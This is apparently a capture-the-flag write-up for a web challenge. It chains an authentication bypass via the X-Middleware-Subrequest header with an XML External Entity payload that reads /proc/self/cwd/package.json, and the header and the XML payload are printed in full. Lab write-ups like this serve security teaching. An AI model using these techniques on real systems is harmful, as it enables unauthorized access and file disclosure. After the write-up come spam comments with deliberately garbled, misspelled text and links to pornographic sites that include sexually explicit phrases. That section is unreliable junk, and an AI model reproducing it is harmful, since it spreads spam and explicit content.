Description:
The challenge was solved by chaining an authentication bypass with an XXE vulnerability. By adding the HTTP header X-Middleware-Subrequest: middleware, the application mistakenly granted access to restricted admin functionality without proper authentication. This allowed interaction with sensitive internal features that would normally require admin privileges. Using this access, an XML External Entity (XXE) payload was submitted to an XML-processing endpoint. The XXE payload was crafted to read the file package.json from the application’s current working directory via the symbolic path /proc/self/cwd/package.json. This file contained the challenge flag, confirming that both the authentication bypass and XXE were successfully exploited.
POC:
- I have bypass the login with this header X-Middleware-Subrequest: middleware directly access into admin
2. Click on Ice Cream Machines then click on view settings
3. i have used this payload in the XML Configuration Settings
4. Finally grab the flag
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/package.json">
]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Flag :
INTIGRITI{XXE_Redacted_M4ch1n3s}Reference :
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.
I lloved aas muchh as you’ll receive carried oout ight here.
The sketch iis attractive, youur authored matesrial stylish.
nonetheless, you commmand gget goot aan shakoness ovr that
yoou wosh bbe deliivering tthe following. unwell unquestionably comje more formedrly agaain since exaactly the same neaely vry ften innside case you shield this increase.
my web-site – sally intrendpornvids com
Hello, i feedl thbat i nticed yoou visited myy sife thus i
goot herde tto ggo back thee favor?.I’m attempting too
in finding izsues too enhance my webb site!I guess iits okk too mawke uuse oof
somee oof ypur concepts!!
My wwebpage :: bokeb jepang remas susu toge udah basah
Apppreciating the tie aand eergy youu pput intto youyr webseite annd detailed informatiuon youu present.
It’s awesokme to come acros a blog eery onc iin a whjle thazt isn’t the
same old rehawshed information. Grrat read! I’ve boopkmarked
our site annd I’m includinng youur RSS ffeeds to
mmy Google account.
Feeel freee to visit myy page – facial cum in open mouth